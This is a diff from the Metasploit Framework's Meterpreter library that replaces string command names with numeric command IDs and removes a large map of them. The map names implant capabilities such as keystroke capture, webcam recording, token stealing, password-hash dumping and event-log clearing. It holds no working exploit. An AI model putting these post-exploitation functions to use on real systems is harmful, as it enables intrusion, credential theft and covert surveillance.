   UNHOOK_ERROR_SUCCESS = 0
 
+  def self.extension_id
+    EXTENSION_ID_UNOOK
+  end
+
   def initialize(client)
     super(client, 'unhook')
 
@@ -30,11 +34,11 @@ def initialize(client)
   end
 
   def unhook_pe
-    request = Packet.create_request('unhook_pe')
+    request = Packet.create_request(COMMAND_ID_UNHOOK_PE)
     response = client.send_request(request)
     response_code = response.get_tlv_value(TLV_TYPE_UNHOOK_ERROR_CODE)
 
-    raise Exception, "Did not get ERROR_SUCCESS back!" if response_code != UNHOOK_ERROR_SUCCESS
+    raise Exception, 'Did not get ERROR_SUCCESS back!' if response_code != UNHOOK_ERROR_SUCCESS
     return 0, response_code, nil
   end
 
diff --git a/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb b/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb
index 6c455e04ea48f..099ec10c823e3 100644
--- a/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb
@@ -4,8 +4,16 @@ module Post
 module Meterpreter
 module Extensions
 module Winpmem
-  TLV_TYPE_WINPMEM_ERROR_CODE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1)
-  TLV_TYPE_WINPMEM_MEMORY_SIZE = TLV_META_TYPE_QWORD | (TLV_EXTENSIONS + 2)
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_WINPMEM = 7000
+
+# Associated command ids
+COMMAND_ID_WINPMEM_DUMP_RAM = EXTENSION_ID_WINPMEM + 1
+
+TLV_TYPE_WINPMEM_ERROR_CODE  = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1)
+TLV_TYPE_WINPMEM_MEMORY_SIZE = TLV_META_TYPE_QWORD | (TLV_EXTENSIONS + 2)
+
 end
 end
 end
diff --git a/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb b/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb
index 4e9173190fc9e..1e467a9c37ff1 100644
--- a/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb
+++ b/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb
@@ -20,6 +20,10 @@ class Winpmem < Extension
   WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL = 4
   WINPMEM_ERROR_UNKNOWN = 255
 
+  def self.extension_id
+    EXTENSION_ID_WINPMEM
+  end
+
   def initialize(client)
     super(client, 'winpmem')
 
@@ -33,7 +37,7 @@ def initialize(client)
   end
 
   def dump_ram
-    request = Packet.create_request('winpmem_dump_ram')
+    request = Packet.create_request(COMMAND_ID_WINPMEM_DUMP_RAM)
     response = client.send_request(request)
     response_code = response.get_tlv_value(TLV_TYPE_WINPMEM_ERROR_CODE)
 
@@ -42,10 +46,10 @@ def dump_ram
     memory_size = response.get_tlv_value(TLV_TYPE_WINPMEM_MEMORY_SIZE)
     channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID)
 
-    raise Exception, "We did not get a channel back!" if channel_id.nil?
+    raise Exception, 'We did not get a channel back!' if channel_id.nil?
 
     # Open the compressed Channel
-    channel = Rex::Post::Meterpreter::Channels::Pool.new(client, channel_id, "winpmem",
+    channel = Rex::Post::Meterpreter::Channels::Pool.new(client, channel_id, 'winpmem',
       CHANNEL_FLAG_SYNCHRONOUS | CHANNEL_FLAG_COMPRESS, response)
     return memory_size, response_code, channel
   end
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index 83e8c2bcecc85..f46fa6a4cef3a 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -50,7 +50,7 @@ module Meterpreter
 # TLV Specific Types
 #
 TLV_TYPE_ANY                 = TLV_META_TYPE_NONE   |   0
-TLV_TYPE_METHOD              = TLV_META_TYPE_UINT   |   1
+TLV_TYPE_COMMAND_ID          = TLV_META_TYPE_UINT   |   1
 TLV_TYPE_REQUEST_ID          = TLV_META_TYPE_STRING |   2
 TLV_TYPE_EXCEPTION           = TLV_META_TYPE_GROUP  |   3
 TLV_TYPE_RESULT              = TLV_META_TYPE_UINT   |   4
@@ -136,500 +136,6 @@ module Meterpreter
 GUID_SIZE = 16
 NULL_GUID = "\x00" * GUID_SIZE
 
-#
-# Mapping of command strings to identifiers
-#
-#
-COMMAND_ID_START_CORE       = 0
-COMMAND_ID_START_STDAPI     = 1000
-COMMAND_ID_START_PRIV       = 2000
-COMMAND_ID_START_EXTAPI     = 3000
-COMMAND_ID_START_SNIFFER    = 4000
-COMMAND_ID_START_ANDROID    = 5000
-COMMAND_ID_START_NETWORKPUG = 6000
-COMMAND_ID_START_WINPMEM    = 7000
-COMMAND_ID_START_KIWI       = 8000
-COMMAND_ID_START_APPAPI     = 9000
-COMMAND_ID_START_UNHOOK     = 10000
-COMMAND_ID_START_ESPIA      = 11000
-COMMAND_ID_START_INCOGNITO  = 12000
-COMMAND_ID_START_PYTHON     = 13000
-COMMAND_ID_START_POWERSHELL = 14000
-COMMAND_ID_START_LANATTACKS = 15000
-COMMAND_ID_START_PEINJECTOR = 16000
-COMMAND_ID_START_MIMIKATZ   = 17000
-
-COMMAND_ID_MAP_CORE = {
-  'core_channel_close'            => COMMAND_ID_START_CORE + 1,
-  'core_channel_eof'              => COMMAND_ID_START_CORE + 2,
-  'core_channel_interact'         => COMMAND_ID_START_CORE + 3,
-  'core_channel_open'             => COMMAND_ID_START_CORE + 4,
-  'core_channel_read'             => COMMAND_ID_START_CORE + 5,
-  'core_channel_seek'             => COMMAND_ID_START_CORE + 6,
-  'core_channel_tell'             => COMMAND_ID_START_CORE + 7,
-  'core_channel_write'            => COMMAND_ID_START_CORE + 8,
-  'core_console_write'            => COMMAND_ID_START_CORE + 9,
-  'core_enumextcmd'               => COMMAND_ID_START_CORE + 10,
-  'core_get_session_guid'         => COMMAND_ID_START_CORE + 11,
-  'core_loadlib'                  => COMMAND_ID_START_CORE + 12,
-  'core_machine_id'               => COMMAND_ID_START_CORE + 13,
-  'core_migrate'                  => COMMAND_ID_START_CORE + 14,
-  'core_native_arch'              => COMMAND_ID_START_CORE + 15,
-  'core_negotiate_tlv_encryption' => COMMAND_ID_START_CORE + 16,
-  'core_patch_url'                => COMMAND_ID_START_CORE + 17,
-  'core_pivot_add'                => COMMAND_ID_START_CORE + 18,
-  'core_pivot_remove'             => COMMAND_ID_START_CORE + 19,
-  'core_pivot_session_died'       => COMMAND_ID_START_CORE + 20,
-  'core_set_session_guid'         => COMMAND_ID_START_CORE + 21,
-  'core_set_uuid'                 => COMMAND_ID_START_CORE + 22,
-  'core_shutdown'                 => COMMAND_ID_START_CORE + 23,
-  'core_transport_add'            => COMMAND_ID_START_CORE + 24,
-  'core_transport_change'         => COMMAND_ID_START_CORE + 25,
-  'core_transport_getcerthash'    => COMMAND_ID_START_CORE + 26,
-  'core_transport_list'           => COMMAND_ID_START_CORE + 27,
-  'core_transport_next'           => COMMAND_ID_START_CORE + 28,
-  'core_transport_prev'           => COMMAND_ID_START_CORE + 29,
-  'core_transport_remove'         => COMMAND_ID_START_CORE + 30,
-  'core_transport_setcerthash'    => COMMAND_ID_START_CORE + 31,
-  'core_transport_set_timeouts'   => COMMAND_ID_START_CORE + 32,
-  'core_transport_sleep'          => COMMAND_ID_START_CORE + 33,
-}
-
-COMMAND_ID_MAP_STDAPI = {
-  'stdapi_fs_chdir'                           => COMMAND_ID_START_STDAPI + 1,
-  'stdapi_fs_chmod'                           => COMMAND_ID_START_STDAPI + 2,
-  'stdapi_fs_delete_dir'                      => COMMAND_ID_START_STDAPI + 3,
-  'stdapi_fs_delete_file'                     => COMMAND_ID_START_STDAPI + 4,
-  'stdapi_fs_file_copy'                       => COMMAND_ID_START_STDAPI + 5,
-  'stdapi_fs_file_expand_path'                => COMMAND_ID_START_STDAPI + 6,
-  'stdapi_fs_file_move'                       => COMMAND_ID_START_STDAPI + 7,
-  'stdapi_fs_getwd'                           => COMMAND_ID_START_STDAPI + 8,
-  'stdapi_fs_ls'                              => COMMAND_ID_START_STDAPI + 9,
-  'stdapi_fs_md5'                             => COMMAND_ID_START_STDAPI + 10,
-  'stdapi_fs_mkdir'                           => COMMAND_ID_START_STDAPI + 11,
-  'stdapi_fs_mount_show'                      => COMMAND_ID_START_STDAPI + 12,
-  'stdapi_fs_search'                          => COMMAND_ID_START_STDAPI + 13,
-  'stdapi_fs_separator'                       => COMMAND_ID_START_STDAPI + 14,
-  'stdapi_fs_sha1'                            => COMMAND_ID_START_STDAPI + 15,
-  'stdapi_fs_stat'                            => COMMAND_ID_START_STDAPI + 16,
-  'stdapi_net_config_add_route'               => COMMAND_ID_START_STDAPI + 17,
-  'stdapi_net_config_get_arp_table'           => COMMAND_ID_START_STDAPI + 18,
-  'stdapi_net_config_get_interfaces'          => COMMAND_ID_START_STDAPI + 19,
-  'stdapi_net_config_get_netstat'             => COMMAND_ID_START_STDAPI + 20,
-  'stdapi_net_config_get_proxy'               => COMMAND_ID_START_STDAPI + 21,
-  'stdapi_net_config_get_routes'              => COMMAND_ID_START_STDAPI + 22,
-  'stdapi_net_config_remove_route'            => COMMAND_ID_START_STDAPI + 23,
-  'stdapi_net_resolve_host'                   => COMMAND_ID_START_STDAPI + 24,
-  'stdapi_net_resolve_hosts'                  => COMMAND_ID_START_STDAPI + 25,
-  'stdapi_net_socket_tcp_shutdown'            => COMMAND_ID_START_STDAPI + 26,
-  'stdapi_net_tcp_channel_open'               => COMMAND_ID_START_STDAPI + 27,
-  'stdapi_railgun_api'                        => COMMAND_ID_START_STDAPI + 28,
-  'stdapi_railgun_api_multi'                  => COMMAND_ID_START_STDAPI + 29,
-  'stdapi_railgun_memread'                    => COMMAND_ID_START_STDAPI + 30,
-  'stdapi_railgun_memwrite'                   => COMMAND_ID_START_STDAPI + 31,
-  'stdapi_registry_check_key_exists'          => COMMAND_ID_START_STDAPI + 32,
-  'stdapi_registry_close_key'                 => COMMAND_ID_START_STDAPI + 33,
-  'stdapi_registry_create_key'                => COMMAND_ID_START_STDAPI + 34,
-  'stdapi_registry_delete_key'                => COMMAND_ID_START_STDAPI + 35,
-  'stdapi_registry_delete_value'              => COMMAND_ID_START_STDAPI + 36,
-  'stdapi_registry_enum_key'                  => COMMAND_ID_START_STDAPI + 37,
-  'stdapi_registry_enum_key_direct'           => COMMAND_ID_START_STDAPI + 38,
-  'stdapi_registry_enum_value'                => COMMAND_ID_START_STDAPI + 39,
-  'stdapi_registry_enum_value_direct'         => COMMAND_ID_START_STDAPI + 40,
-  'stdapi_registry_load_key'                  => COMMAND_ID_START_STDAPI + 41,
-  'stdapi_registry_open_key'                  => COMMAND_ID_START_STDAPI + 42,
-  'stdapi_registry_open_remote_key'           => COMMAND_ID_START_STDAPI + 43,
-  'stdapi_registry_query_class'               => COMMAND_ID_START_STDAPI + 44,
-  'stdapi_registry_query_value'               => COMMAND_ID_START_STDAPI + 45,
-  'stdapi_registry_query_value_direct'        => COMMAND_ID_START_STDAPI + 46,
-  'stdapi_registry_set_value'                 => COMMAND_ID_START_STDAPI + 47,
-  'stdapi_registry_set_value_direct'          => COMMAND_ID_START_STDAPI + 48,
-  'stdapi_registry_unload_key'                => COMMAND_ID_START_STDAPI + 49,
-  'stdapi_sys_config_driver_list'             => COMMAND_ID_START_STDAPI + 50,
-  'stdapi_sys_config_drop_token'              => COMMAND_ID_START_STDAPI + 51,
-  'stdapi_sys_config_getenv'                  => COMMAND_ID_START_STDAPI + 52,
-  'stdapi_sys_config_getprivs'                => COMMAND_ID_START_STDAPI + 53,
-  'stdapi_sys_config_getsid'                  => COMMAND_ID_START_STDAPI + 54,
-  'stdapi_sys_config_getuid'                  => COMMAND_ID_START_STDAPI + 55,
-  'stdapi_sys_config_localtime'               => COMMAND_ID_START_STDAPI + 56,
-  'stdapi_sys_config_rev2self'                => COMMAND_ID_START_STDAPI + 57,
-  'stdapi_sys_config_steal_token'             => COMMAND_ID_START_STDAPI + 58,
-  'stdapi_sys_config_sysinfo'                 => COMMAND_ID_START_STDAPI + 59,
-  'stdapi_sys_eventlog_clear'                 => COMMAND_ID_START_STDAPI + 60,
-  'stdapi_sys_eventlog_close'                 => COMMAND_ID_START_STDAPI + 61,
-  'stdapi_sys_eventlog_numrecords'            => COMMAND_ID_START_STDAPI + 62,
-  'stdapi_sys_eventlog_oldest'                => COMMAND_ID_START_STDAPI + 63,
-  'stdapi_sys_eventlog_open'                  => COMMAND_ID_START_STDAPI + 64,
-  'stdapi_sys_eventlog_read'                  => COMMAND_ID_START_STDAPI + 65,
-  'stdapi_sys_power_exitwindows'              => COMMAND_ID_START_STDAPI + 66,
-  'stdapi_sys_process_attach'                 => COMMAND_ID_START_STDAPI + 67,
-  'stdapi_sys_process_close'                  => COMMAND_ID_START_STDAPI + 68,
-  'stdapi_sys_process_execute'                => COMMAND_ID_START_STDAPI + 69,
-  'stdapi_sys_process_get_info'               => COMMAND_ID_START_STDAPI + 70,
-  'stdapi_sys_process_get_processes'          => COMMAND_ID_START_STDAPI + 71,
-  'stdapi_sys_process_getpid'                 => COMMAND_ID_START_STDAPI + 72,
-  'stdapi_sys_process_image_get_images'       => COMMAND_ID_START_STDAPI + 73,
-  'stdapi_sys_process_image_get_proc_address' => COMMAND_ID_START_STDAPI + 74,
-  'stdapi_sys_process_image_load'             => COMMAND_ID_START_STDAPI + 75,
-  'stdapi_sys_process_image_unload'           => COMMAND_ID_START_STDAPI + 76,
-  'stdapi_sys_process_kill'                   => COMMAND_ID_START_STDAPI + 77,
-  'stdapi_sys_process_memory_allocate'        => COMMAND_ID_START_STDAPI + 78,
-  'stdapi_sys_process_memory_free'            => COMMAND_ID_START_STDAPI + 79,
-  'stdapi_sys_process_memory_lock'            => COMMAND_ID_START_STDAPI + 80,
-  'stdapi_sys_process_memory_protect'         => COMMAND_ID_START_STDAPI + 81,
-  'stdapi_sys_process_memory_query'           => COMMAND_ID_START_STDAPI + 82,
-  'stdapi_sys_process_memory_read'            => COMMAND_ID_START_STDAPI + 83,
-  'stdapi_sys_process_memory_unlock'          => COMMAND_ID_START_STDAPI + 84,
-  'stdapi_sys_process_memory_write'           => COMMAND_ID_START_STDAPI + 85,
-  'stdapi_sys_process_thread_close'           => COMMAND_ID_START_STDAPI + 86,
-  'stdapi_sys_process_thread_create'          => COMMAND_ID_START_STDAPI + 87,
-  'stdapi_sys_process_thread_get_threads'     => COMMAND_ID_START_STDAPI + 88,
-  'stdapi_sys_process_thread_open'            => COMMAND_ID_START_STDAPI + 89,
-  'stdapi_sys_process_thread_query_regs'      => COMMAND_ID_START_STDAPI + 90,
-  'stdapi_sys_process_thread_resume'          => COMMAND_ID_START_STDAPI + 91,
-  'stdapi_sys_process_thread_set_regs'        => COMMAND_ID_START_STDAPI + 92,
-  'stdapi_sys_process_thread_suspend'         => COMMAND_ID_START_STDAPI + 93,
-  'stdapi_sys_process_thread_terminate'       => COMMAND_ID_START_STDAPI + 94,
-  'stdapi_sys_process_wait'                   => COMMAND_ID_START_STDAPI + 95,
-  'stdapi_ui_desktop_enum'                    => COMMAND_ID_START_STDAPI + 96,
-  'stdapi_ui_desktop_get'                     => COMMAND_ID_START_STDAPI + 97,
-  'stdapi_ui_desktop_screenshot'              => COMMAND_ID_START_STDAPI + 98,
-  'stdapi_ui_desktop_set'                     => COMMAND_ID_START_STDAPI + 99,
-  'stdapi_ui_enable_keyboard'                 => COMMAND_ID_START_STDAPI + 100,
-  'stdapi_ui_enable_mouse'                    => COMMAND_ID_START_STDAPI + 101,
-  'stdapi_ui_get_idle_time'                   => COMMAND_ID_START_STDAPI + 102,
-  'stdapi_ui_get_keys_utf8'                   => COMMAND_ID_START_STDAPI + 103,
-  'stdapi_ui_send_keyevent'                   => COMMAND_ID_START_STDAPI + 104,
-  'stdapi_ui_send_keys'                       => COMMAND_ID_START_STDAPI + 105,
-  'stdapi_ui_send_mouse'                      => COMMAND_ID_START_STDAPI + 106,
-  'stdapi_ui_start_keyscan'                   => COMMAND_ID_START_STDAPI + 107,
-  'stdapi_ui_stop_keyscan'                    => COMMAND_ID_START_STDAPI + 108,
-  'stdapi_ui_unlock_desktop'                  => COMMAND_ID_START_STDAPI + 109,
-  'stdapi_webcam_audio_record'                => COMMAND_ID_START_STDAPI + 110,
-  'stdapi_webcam_get_frame'                   => COMMAND_ID_START_STDAPI + 111,
-  'stdapi_webcam_list'                        => COMMAND_ID_START_STDAPI + 112,
-  'stdapi_webcam_start'                       => COMMAND_ID_START_STDAPI + 113,
-  'stdapi_webcam_stop'                        => COMMAND_ID_START_STDAPI + 114,
-}
-
-COMMAND_ID_MAP_ANDROID = {
-  'android_activity_start'   => COMMAND_ID_START_ANDROID + 1,
-  'android_check_root'       => COMMAND_ID_START_ANDROID + 2,
-  'android_device_shutdown'  => COMMAND_ID_START_ANDROID + 3,
-  'android_dump_calllog'     => COMMAND_ID_START_ANDROID + 4,
-  'android_dump_contacts'    => COMMAND_ID_START_ANDROID + 5,
-  'android_dump_sms'         => COMMAND_ID_START_ANDROID + 6,
-  'android_geolocate'        => COMMAND_ID_START_ANDROID + 7,
-  'android_hide_app_icon'    => COMMAND_ID_START_ANDROID + 8,
-  'android_interval_collect' => COMMAND_ID_START_ANDROID + 9,
-  'android_send_sms'         => COMMAND_ID_START_ANDROID + 10,
-  'android_set_audio_mode'   => COMMAND_ID_START_ANDROID + 11,
-  'android_set_wallpaper'    => COMMAND_ID_START_ANDROID + 12,
-  'android_sqlite_query'     => COMMAND_ID_START_ANDROID + 13,
-  'android_wakelock'         => COMMAND_ID_START_ANDROID + 14,
-  'android_wlan_geolocate'   => COMMAND_ID_START_ANDROID + 15,
-}
-
-COMMAND_ID_MAP_APPAPI = {
-  'appapi_app_install'   => COMMAND_ID_START_APPAPI + 1,
-  'appapi_app_list'      => COMMAND_ID_START_APPAPI + 2,
-  'appapi_app_run'       => COMMAND_ID_START_APPAPI + 3,
-  'appapi_app_uninstall' => COMMAND_ID_START_APPAPI + 4,
-}
-
-COMMAND_ID_MAP_WINPMEM = {
-  'winpmem_dump_ram' => COMMAND_ID_START_WINPMEM + 1,
-}
-
-COMMAND_ID_MAP_ESPIA = {
-  'espia_image_get_dev_screen' => COMMAND_ID_START_ESPIA + 1,
-}
-
-COMMAND_ID_MAP_EXTAPI = {
-  'extapi_adsi_domain_query'        => COMMAND_ID_START_EXTAPI + 1,
-  'extapi_clipboard_get_data'       => COMMAND_ID_START_EXTAPI + 2,
-  'extapi_clipboard_monitor_dump'   => COMMAND_ID_START_EXTAPI + 3,
-  'extapi_clipboard_monitor_pause'  => COMMAND_ID_START_EXTAPI + 4,
-  'extapi_clipboard_monitor_purge'  => COMMAND_ID_START_EXTAPI + 5,
-  'extapi_clipboard_monitor_resume' => COMMAND_ID_START_EXTAPI + 6,
-  'extapi_clipboard_monitor_start'  => COMMAND_ID_START_EXTAPI + 7,
-  'extapi_clipboard_monitor_stop'   => COMMAND_ID_START_EXTAPI + 8,
-  'extapi_clipboard_set_data'       => COMMAND_ID_START_EXTAPI + 9,
-  'extapi_ntds_parse'               => COMMAND_ID_START_EXTAPI + 10,
-  'extapi_pageant_send_query'       => COMMAND_ID_START_EXTAPI + 11,
-  'extapi_service_control'          => COMMAND_ID_START_EXTAPI + 12,
-  'extapi_service_enum'             => COMMAND_ID_START_EXTAPI + 13,
-  'extapi_service_query'            => COMMAND_ID_START_EXTAPI + 14,
-  'extapi_window_enum'              => COMMAND_ID_START_EXTAPI + 15,
-  'extapi_wmi_query'                => COMMAND_ID_START_EXTAPI + 16,
-}
-
-COMMAND_ID_MAP_INCOGNITO = {
-  'incognito_add_group_user'      => COMMAND_ID_START_INCOGNITO + 1,
-  'incognito_add_localgroup_user' => COMMAND_ID_START_INCOGNITO + 2,
-  'incognito_add_user'            => COMMAND_ID_START_INCOGNITO + 3,
-  'incognito_impersonate_token'   => COMMAND_ID_START_INCOGNITO + 4,
-  'incognito_list_tokens'         => COMMAND_ID_START_INCOGNITO + 5,
-  'incognito_snarf_hashes'        => COMMAND_ID_START_INCOGNITO + 6,
-}
-
-COMMAND_ID_MAP_KIWI = {
-  'kiwi_exec_cmd' => COMMAND_ID_START_KIWI + 1,
-}
-
-COMMAND_ID_MAP_LANATTACKS = {
-  'lanattacks_add_tftp_file'   => COMMAND_ID_START_LANATTACKS + 1,
-  'lanattacks_dhcp_log'        => COMMAND_ID_START_LANATTACKS + 2,
-  'lanattacks_reset_dhcp'      => COMMAND_ID_START_LANATTACKS + 3,
-  'lanattacks_reset_tftp'      => COMMAND_ID_START_LANATTACKS + 4,
-  'lanattacks_set_dhcp_option' => COMMAND_ID_START_LANATTACKS + 5,
-  'lanattacks_start_dhcp'      => COMMAND_ID_START_LANATTACKS + 6,
-  'lanattacks_start_tftp'      => COMMAND_ID_START_LANATTACKS + 7,
-  'lanattacks_stop_dhcp'       => COMMAND_ID_START_LANATTACKS + 8,
-  'lanattacks_stop_tftp'       => COMMAND_ID_START_LANATTACKS + 9,
-}
-
-COMMAND_ID_MAP_MIMIKATZ = {
-  'mimikatz_custom_command' => COMMAND_ID_START_MIMIKATZ + 1,
-}
-
-COMMAND_ID_MAP_NETWORKPUG = {
-  'networkpug_start' => COMMAND_ID_START_NETWORKPUG + 1,
-  'networkpug_stop'  => COMMAND_ID_START_NETWORKPUG + 2,
-}
-
-COMMAND_ID_MAP_PEINJECTOR = {
-  'peinjector_inject_shellcode' => COMMAND_ID_START_PEINJECTOR + 1,
-}
-
-COMMAND_ID_MAP_POWERSHELL = {
-  'powershell_assembly_load'  => COMMAND_ID_START_POWERSHELL + 1,
-  'powershell_execute'        => COMMAND_ID_START_POWERSHELL + 2,
-  'powershell_session_remove' => COMMAND_ID_START_POWERSHELL + 3,
-  'powershell_shell'          => COMMAND_ID_START_POWERSHELL + 4,
-}
-
-COMMAND_ID_MAP_PRIV = {
-  'priv_elevate_getsystem'          => COMMAND_ID_START_PRIV + 1,
-  'priv_fs_blank_directory_mace'    => COMMAND_ID_START_PRIV + 2,
-  'priv_fs_blank_file_mace'         => COMMAND_ID_START_PRIV + 3,
-  'priv_fs_get_file_mace'           => COMMAND_ID_START_PRIV + 4,
-  'priv_fs_set_file_mace'           => COMMAND_ID_START_PRIV + 5,
-  'priv_fs_set_file_mace_from_file' => COMMAND_ID_START_PRIV + 6,
-  'priv_passwd_get_sam_hashes'      => COMMAND_ID_START_PRIV + 7,
-}
-
-COMMAND_ID_MAP_PYTHON = {
-  'python_execute' => COMMAND_ID_START_PYTHON + 1,
-  'python_reset'   => COMMAND_ID_START_PYTHON + 2,
-}
-
-COMMAND_ID_MAP_SNIFFER = {
-  'sniffer_capture_dump'      => COMMAND_ID_START_SNIFFER + 1,
-  'sniffer_capture_dump_read' => COMMAND_ID_START_SNIFFER + 2,
-  'sniffer_capture_release'   => COMMAND_ID_START_SNIFFER + 3,
-  'sniffer_capture_start'     => COMMAND_ID_START_SNIFFER + 4,
-  'sniffer_capture_stats'     => COMMAND_ID_START_SNIFFER + 5,
-  'sniffer_capture_stop'      => COMMAND_ID_START_SNIFFER + 6,
-  'sniffer_interfaces'        => COMMAND_ID_START_SNIFFER + 7,
-  }
-
-COMMAND_ID_MAP_UNHOOK = {
-  'unhook_pe' => COMMAND_ID_START_UNHOOK + 1,
-}
-
-COMMAND_ID_MAP = [
-  COMMAND_ID_MAP_CORE,
-  COMMAND_ID_MAP_STDAPI,
-  COMMAND_ID_MAP_PRIV,
-  COMMAND_ID_MAP_EXTAPI,
-  COMMAND_ID_MAP_SNIFFER,
-  COMMAND_ID_MAP_ANDROID,
-  COMMAND_ID_MAP_NETWORKPUG,
-  COMMAND_ID_MAP_WINPMEM,
-  COMMAND_ID_MAP_KIWI,
-  COMMAND_ID_MAP_APPAPI,
-  COMMAND_ID_MAP_UNHOOK,
-  COMMAND_ID_MAP_ESPIA,
-  COMMAND_ID_MAP_INCOGNITO,
-  COMMAND_ID_MAP_PYTHON,
-  COMMAND_ID_MAP_POWERSHELL,
-  COMMAND_ID_MAP_LANATTACKS,
-  COMMAND_ID_MAP_PEINJECTOR,
-  COMMAND_ID_MAP_MIMIKATZ,
-].inject({}) {|m1, m2| m1.merge(m2)}
-
-def self.generate_command_id_map_c
-  id_map = [
-    COMMAND_ID_MAP_CORE,
-    COMMAND_ID_MAP_STDAPI,
-    COMMAND_ID_MAP_PRIV,
-    COMMAND_ID_MAP_EXTAPI,
-    COMMAND_ID_MAP_SNIFFER,
-    COMMAND_ID_MAP_WINPMEM,
-    COMMAND_ID_MAP_KIWI,
-    COMMAND_ID_MAP_UNHOOK,
-    COMMAND_ID_MAP_ESPIA,
-    COMMAND_ID_MAP_INCOGNITO,
-    COMMAND_ID_MAP_PYTHON,
-    COMMAND_ID_MAP_POWERSHELL,
-    COMMAND_ID_MAP_LANATTACKS,
-    COMMAND_ID_MAP_PEINJECTOR,
-    COMMAND_ID_MAP_MIMIKATZ,
-  ].inject({}) {|m1, m2| m1.merge(m2)}
-
-  command_ids = id_map.map {|k, v| "#define COMMAND_ID_#{k.upcase} #{v}"}
-  %Q^
-/*!
- * @file common_command_ids.h
- * @brief Declarations of command ID values
- * @description This file was generated #{Time.now.utc}. Do not modify directly.
- */
-#ifndef _METERPRETER_SOURCE_COMMON_COMMAND_IDS_H
-#define _METERPRETER_SOURCE_COMMON_COMMAND_IDS_H
-
-#{command_ids.join("\n")}
-
-#endif
-  ^
-end
-
-def self.generate_command_id_map_java
-  id_map = [
-    COMMAND_ID_MAP_CORE,
-    COMMAND_ID_MAP_STDAPI,
-  ].inject({}) {|m1, m2| m1.merge(m2)}
-  command_ids = id_map.map {|k, v| "    public static final int #{k.upcase} = #{v};"}
-  %Q^
-package com.metasploit.meterpreter.command;
-
-/**
- * All supported Command Identifiers
- *
- * @author Genereated by a tool @ #{Time.now.utc}
- */
-public interface CommandId {
-#{command_ids.join("\n")}
-}
-  ^
-end
-
-def self.generate_command_id_map_php_lib(lib, id_map)
-  command_ids = id_map.map {|k, v| "define('COMMAND_ID_#{k.upcase}', #{v});"}
-  %Q^
-# ---------------------------------------------------------------
-# --- THIS CONTENT WAS GENERATED BY A TOOL @ #{Time.now.utc}
-# IDs for #{lib}
-#{command_ids.join("\n")}
-# ---------------------------------------------------------------
-  ^
-end
-
-def self.generate_command_id_map_php
-  %Q^
-#{self.generate_command_id_map_php_lib('metsrv', COMMAND_ID_MAP_CORE)}
-
-#{self.generate_command_id_map_php_lib('stdapi', COMMAND_ID_MAP_STDAPI)}
-  ^
-end
-
-def self.generate_command_id_map_python
-  id_map = [
-    COMMAND_ID_MAP_CORE,
-    COMMAND_ID_MAP_STDAPI,
-  ].inject({}) {|m1, m2| m1.merge(m2)}
-  command_ids = id_map.map {|k, v| "    (#{v}, '#{k.downcase}'),"}
-  %Q^
-# ---------------------------------------------------------------
-# --- THIS CONTENT WAS GENERATED BY A TOOL @ #{Time.now.utc}
-COMMAND_IDS = (
-#{command_ids.join("\n")}
-)
-# ---------------------------------------------------------------
-  ^
-end
-
-def self.generate_command_id_map_python_extension
-  id_map = [
-    COMMAND_ID_MAP_CORE,
-    COMMAND_ID_MAP_STDAPI,
-    COMMAND_ID_MAP_PRIV,
-    COMMAND_ID_MAP_EXTAPI,
-    COMMAND_ID_MAP_SNIFFER,
-    COMMAND_ID_MAP_WINPMEM,
-    COMMAND_ID_MAP_KIWI,
-    COMMAND_ID_MAP_UNHOOK,
-    COMMAND_ID_MAP_ESPIA,
-    COMMAND_ID_MAP_INCOGNITO,
-    COMMAND_ID_MAP_PYTHON,
-    COMMAND_ID_MAP_POWERSHELL,
-    COMMAND_ID_MAP_LANATTACKS,
-    COMMAND_ID_MAP_PEINJECTOR,
-    COMMAND_ID_MAP_MIMIKATZ,
-  ].inject({}) {|m1, m2| m1.merge(m2)}
-  command_ids = id_map.map {|k, v| "COMMAND_ID_#{k.upcase} = #{v}"}
-  %Q^
-# ---------------------------------------------------------------
-# --- THIS CONTENT WAS GENERATED BY A TOOL @ #{Time.now.utc}
-
-#{command_ids.join("\n")}
-
-# ---------------------------------------------------------------
-  ^
-end
-
-def self.generate_command_id_map_csharp
-  id_map = [
-    COMMAND_ID_MAP_CORE,
-    COMMAND_ID_MAP_STDAPI,
-    COMMAND_ID_MAP_PRIV,
-    COMMAND_ID_MAP_EXTAPI,
-    COMMAND_ID_MAP_SNIFFER,
-    COMMAND_ID_MAP_WINPMEM,
-    COMMAND_ID_MAP_KIWI,
-    COMMAND_ID_MAP_UNHOOK,
-    COMMAND_ID_MAP_ESPIA,
-    COMMAND_ID_MAP_INCOGNITO,
-    COMMAND_ID_MAP_PYTHON,
-    COMMAND_ID_MAP_POWERSHELL,
-    COMMAND_ID_MAP_LANATTACKS,
-    COMMAND_ID_MAP_PEINJECTOR,
-    COMMAND_ID_MAP_MIMIKATZ,
-  ].inject({}) {|m1, m2| m1.merge(m2)}
-  command_ids = id_map.map {|k, v| "#{k.split('_').map(&:capitalize).join} = #{v},"}
-  %Q^
-/// <summary>
-// This content was generated by a tool @ #{Time.now.utc}
-/// </summary>
-namespace MSF.Powershell.Meterpreter
-{
-    public enum CommandId
-    {
-        #{command_ids.join("\n        ")}
-    }
-}
-  ^
-end
-
-def self.method_string_to_command_id(method_string)
-  unless COMMAND_ID_MAP.include?(method_string)
-    raise ArgumentError, "Unknown Packet command method string: #{method_string}, please report this to the Metasploit team."
-  end
-
-  COMMAND_ID_MAP[method_string]
-end
-
-def self.command_id_to_method_string(method_int)
-  value = COMMAND_ID_MAP.key(method_int)
-
-  if value.nil?
-    raise ArgumentError, "Unknown Packet command method integer: #{}, please report this to the Metasploit team."
-  end
-
-  value
-end
-
-
 ###
 #
 # Base TLV (Type-Length-Value) class
